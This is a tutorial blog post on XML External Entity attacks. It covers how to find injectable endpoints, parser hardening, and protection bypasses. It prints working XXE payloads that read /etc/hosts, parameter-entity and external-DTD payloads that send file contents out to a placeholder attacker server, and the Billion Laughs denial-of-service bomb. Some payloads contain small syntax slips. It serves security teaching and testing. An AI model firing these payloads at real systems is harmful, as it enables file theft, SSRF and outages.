&XMLol;

Even if it doesn’t get a billion LOLs, this week’s article dives into a real classic. XML External Entity attacks are a historic vulnerability that continue to impact modern applications. We’ll be covering how to identify them in the wild, common protections, and even bypasses to said protections!

What is XML Injection?

Occurring when user-input is entered into a server-side XML document, XML injection (XMLi) relies on modifying the structure of the document it’s inserted into so that it may perform unauthorized actions on behalf of an adversary. As this occurs server-side, the vulnerability is able to achieve a wide variety of effects including data exfiltration, server side request forgery (SSRF), and even denial of service (DoS).

Core Components:

While I normally try to avoid including base definitions in these articles, I do want to highlight the following components of an XML document, as they’ll be the cornerstone of crafting our exploits.

Document Type Definitions:

To draw a comparison to object-oriented programming, a document type definition (DTD) is similar to a header file. Containing declarations of elements, attributes, and entities, the DTD is used to define the structure and content of an XML document. These DTDs can then be applied to a document in two main ways, inline and external.

An inline DTD is declared in the XML document in which it is applied. Typically, in the following fashion:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE Example [
  <!ELEMENT Example (#PCDATA)>
  <!ELEMENT Message (#PCDATA)>
]>
<Example>
  <Message>Eru Was Here!</Message>
</Example>

An external DTD on the other hand, is declared in an external .dtd file and is included into the XML document similar to how a header is used. Our DTD file would look like this:

  <!ELEMENT Example (#PCDATA)>
  <!ELEMENT Message (#PCDATA)>

While the XML file it would be embedded into, would then become the following:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE Example SYSTEM “Example.dtd”>
<Example>
  <Message>Eru Was Here!</Message>
</Example>

External Entities:

Continuing with our programming analogy, entities are comparable to variables, and external entities specifically are entities that reference an external resource, i.e. a file or a URL. These external entities allow us to include content outside of the XML document itself and are used in the following manner:

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY external_entity SYSTEM “file:///etc/hosts”>
<Example>
  &external_entity;
</Example>

Classic XXE:

At their core, XML external entities (XXEs) are a feature of XML documents. They’re used to increase ease of programming, modularity, and readability. That said, they’re also a key target for adversaries as they have the ability to leak confidential information, create requests on the server’s behalf, and can even bring down the application entirely if not secured properly. Traditional XXE attacks are aimed at injecting external entities into server-side XML, with the results being directly returned as a part of the resulting document.

Blind XXE:

When the resulting XML document is not included in the HTTP response, adversaries must find other ways to extract this information. Most often, this will take the form of out-of-band attacks where an adversary will have the server append sensitive information to requests addressed to a server they control and can view at their leisure. It is important to note that there are several more constraints that can prevent a blind XXE, with options such as limiting outbound network traffic being the most straightforward.


Finding XMLi:

Identify Endpoints:

Our first step in identifying XMLi will be to identify where in the application XML data is allowed and is processed by an XML parser on the server. Typical functionality to investigate includes internal data transfers, file uploads, and endpoints expecting JSON or text objects.

Data Transfers:

XML is often used when moving data internally in an application. As a result, we should keep an eye out for HTTP messages containing XML data and test them for injection when found. It's worth remembering that a common technique for transferring data in HTTP messages is to base64 encode it, we should always remember to check thoroughly when looking for endpoints.

File Uploads:

We should also be mindful of endpoints that allow for file uploads. Even if the endpoint is not directly asking for an XML document, several file formats support XML and may provide us the opportunity to find an injection point. Commonly vulnerable file types include:

  • SVG: An image format comprised of XML formatted data.
  • DOCX, PPTX, XLSX: Microsoft Office files can be unarchived to expose the composite files that make up the finished document. Several of these files are already XML formatted, and we can then insert our malicious payloads into them directly before re-archiving the files back to their original extension.
  • PDF: XML data can be embedded within PDFs, abusing the fact that XML is naturally a part of PDF files, XXE payloads can be included in sections such as annotations and comments, which are stored as XML alongside the PDF.

JSON Downgrading:

If the application is expecting user-input to be formatted as a JSON object, we can try providing XML instead by converting the JSON object structure to an XML structure instsead. Then, by altering the Content-Type header to one of the following:

Content-Type: text/xml
Content-Type: application/xml

We can check to see if the application parses the provided XML anyways, regardless of what it was expecting. If so, the endpoint might be vulnerable to XML injection. This same mentality can be applied if the endpoint is natively allowing for a Content-Type: text/plain.

Testing for Classic XXE:

After identifying endpoints within the application that will accept XML data, our next step will be to test for the ability to include external entities. It's important to remember that just allowing for XML data is not a vulnerability, we must be able to show impact. To that end, our goal will be to demonstrate an XXE. A simple XXE payload is as follows:

<?xml version="1.0" encoding="UTF-8">
<!DOCTYPE Example[
  <!ENTITY xxe SYSTEM "file:///etc/hosts">
]>
<Example>&xxe;</Example>

Testing for Blind XXE:

If we believe we've found an endpoint that is parsing our provided XML data, but it doesn't return anything to us in the HTTP response, we can instead test for a blind XXE. Using out-of-band testing, we can force the application to make a request to a server we control. If we then see the traffic in our server's logs, we can confirm that the vulnerability does exist. A simple proof of concept would be the following:

<?xml version="1.0" encoding="UTF-8">
<!DOCTYPE Example[
  <!ENTITY xxe SYSTEM "http://ATK_SVR:80/example.txt">
]>
<Example>&xxe</Example>

That said, a meaningful blind XXE is much harder to demonstrate. If we want to leverage this vulnerability to confirm information disclosure, we'll have to rely on the XML parser allowing at least the following:

  • Outbound Network Requests
  • External DTDs
  • Parameter Entities
  • Excessive Internal Permissions

If any of these are disabled or missing, we might not be able to create a meaningful exploit against the endpoint.


Preventing XXE Attacks:

The core of preventing XML injection will be in limiting the capabilities of our XML parser. By restricting the parser to only the capabilities and access that is needed for its intended functionality, we're able to lower the impact of any potential injection found.

Knowing your Parser:

By default, XML parsers are quite privileged. Lowering these default settings is the most straightforward method of preventing an attack.

Things to Disable:

Several of the default settings can be outright disabled when not necessary for intended functionality, the following are only some of the most common options:

  • DTD Processing
  • Inline DTDs
  • Entity Expansion
  • External Entities
  • Parameter Entities
  • Outbound Network Requests
  • Parse-Time
  • Parse-Depth (recursion)

As with most, best-security practices, if a functionality isn’t needed, don’t include it!

Permissions:

Another point to remember is that you can limit what the parser has access to. By restricting its ability to interact with system files or anything beyond what is strictly necessary, we're able to largely mitigate a vulnerability's impact.

Input Sanitization:

Beyond restricting the parser, defense-in-depth would have us ensure that sufficient input validation is also in place. Properly escaping special characters that are essential to XML syntax may even fully stop a potential vulnerability. Further, restricting any file upload to only the expected file type, and ensuring any file that could include XML data is either not processed, or is sanitized before being processed by the server.

Update Often:

XML injection vulnerabilities may also be introduced due to external dependencies. By maintaining a healthy update schedule, we can limit the possibility for known exploits to impact our application.


Bypassing XMLi Protections:

When considering the protections put in place to prevent an XXE attack, there is little we can do to work around an option that is outright disabled. That said, creativity can easily be the difference between reporting a critical and having no bug at all.

XInclude:

If we’re unable to find an endpoint in which we can submit an XML document that we control, but we strongly suspect the server to be vulnerable to XXE, we can instead attempt to use an XInclude. XInclude is a feature that when included into the body of an XML document acts the same as an external DTD. This functions similarly to a second-order injection, in that the content by itself doesn’t result in exploitation, rather, later parsing by the server is our intended target.

In the following example, let’s assume that the content found withing the <Message> was user provided at an earlier junction and has since been incorporated into this XML document for rendering:

<?xml version="1.0" encoding="UTF-8"?>
<Example>
  <Message>
    <xi:include parse=”text” href="file:///etc/hosts" xmlns:xi="http://www.w3.org/2001/XInclude"/>
  </Message>
</Example>

If done properly, the contents of our message will instead contain the contents of /etc/hosts.

Blind Exfiltration:

Assuming the HTTP response does not contain the resulting XML document, we’re left with the option to use test for blind XXE. As this will largely rely on out-of-band testing, we’ll need to establish a method of viewing the information we’re attempting to disclose.

Parameter Entities:

While our minds might lean towards the external entities we’ve covered so far, the reality is that the resulting XXE structure wouldn’t work in most cases. Let’s look at the following example:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE Example[
  <!ENTITY target_file SYSTEM “file:///etc/hosts”>
  <!ENTITY xxe SYSTEM "http://ATK_SVR:80/?&target_file;">
]>
<Example>
&xxe;
</Example>

The reason this fails is due to our second ENTITY, “xxe”. Most XML parsers won’t allow an external entity to be embedded within another. Often, this is disabled in an effort to prevent recursion and excessive resource consumption, and effectively prevents us from building a payload for our blind XXE.

Instead, we can rely on another feature of the DTD, parameter entities. Declared, and only usable, within the DTD, parameter entities are used to define a set of values that are used to construct a larger XML document. Declared similarly to an external entity with the ENTITY keyword, the key distinction with a parameter entity will be the % in its declaration, such as:

<!ENTITY % target_file SYSTEM “file:///etc/hosts”>

Unlike external entities, parameter entities can be embedded within one another, and can be used to fix our previous example. Let’s review the following:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE Example[
  <!ENTITY % target_file SYSTEM “file:///etc/hosts”>
  <!ENTITY % xxe “<!ENTITY &#x25; run SYSTEM ‘http://ATK_SVR:80/?&target_file;’>”>
  %xxe;
  %run;
]>

Similar to our initial example, we’ll construct an entity aimed at the file we wish to extract. The core differences arise in our second entity, “xxe”. Here, our parameter entity is declared as the string, “<!ENTITY &#x25; run SYSTEM ‘http://ATK_SVR:80/?&target_file;’>”. In this string, we are declaring a third parameter entity, “run”, that then contains our payload to exfiltrate /etc/hosts from the target.

This is done because “target_file” will only resolve at execution. Meaning, we will rely on “xxe” to create the payload where “run” contains the contents of “target_file”, not just a reference to another parameter. Once the “xxe” parameter call is executed, “run” is built. We then call “run” to reach externally to the server we control, where we can view the appended contents of “target_file” in our server logs.

While that’s tricky enough, it still may not be enough to bypass the XML parsers protections. A typical setting in parsers is to disallow inline DTDs from using parameter entities, entirely undermining what we’ve achieved so far. Or is it? Instead, if we format our payload to rely on an external DTD, and host said file on our controlled server, we can modify the previous example to be split among two files, a .dtd, and our xml payload. First, let’s look at the .dtd:

<!ENTITY % target_file SYSTEM “file:///etc/hosts”>
<!ENTITY % xxe “<!ENTITY &#x25; run SYSTEM ‘http://ATK_SVR:80/?&target_file;’>”>
%xxe;
%run;

We would then call this external DTD with the following XML payload:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE Example[
  <!ENTITY % xxe SYSTEM “http://ATK_SVR/example.dtd”>
  %xxe;
]>

Escalating XMLi:

While we’ve extensively covered the fact that XMLi can be used to exfiltrate confidential information, it can also be used as an avenue for other attack vectors. The most common being SSRF and DoS.

Server Side Request Forgery:

Resulting from the fact that our injected XXE can force a server to make outbound requests on our behalf, we can then begin to explore what all the application has access to. By controlling server requests, we can attempt to enumerate internal services, expanding our understanding of the attack surface even further, and serving as a launching point for further exploitation. If you haven’t taken the time to check out An SSRFing Mess, I would highly recommend it for a more full explanation of what’s possible with this attack vector.

Denial of Service:

Another common use case of XXE is to conduct a DoS attack, with the most famous example being the Billion Laughs attack. Also referred to as an XML bomb, XXE vulnerabilities contain the opportunity for an attacker to completely deny access to the application via a relatively small payload. This is due to XML parsers being capable of allowing for external entities to use recursion, with the Wikipedia example of this attack being the following:

<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ELEMENT lolz (#PCDATA)>
  <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

Each level of entity, from “lol1” to “lol9” contains 10 copies of the level before it. When expanded, this is equivalent to x^10tth power, meaning a 3-byte payload of “lol” expands to a 30-byte payload at the end of “lol1”, a 300-byte payload at the end of “lol2”, and a 3-gigabyte payload at the end of “lol9”. With one more layer, that becomes 30-gigabyte. I’m sure you can imagine the severity of this recursion being allowed.

Is it in Scope?

It’s critical to remember that in 99% of programs, denial of service testing will be considered out of scope. Always refer to your specific rules of engagement before conducting any testing of this nature, and if in doubt, contact your program (that’s what they’re there for!). If they’re okay with you testing further, simplifying the payload to at most 3 layers of recursion should be plenty, as it sufficiently demonstrates that XML parse depth is not enforced in the application.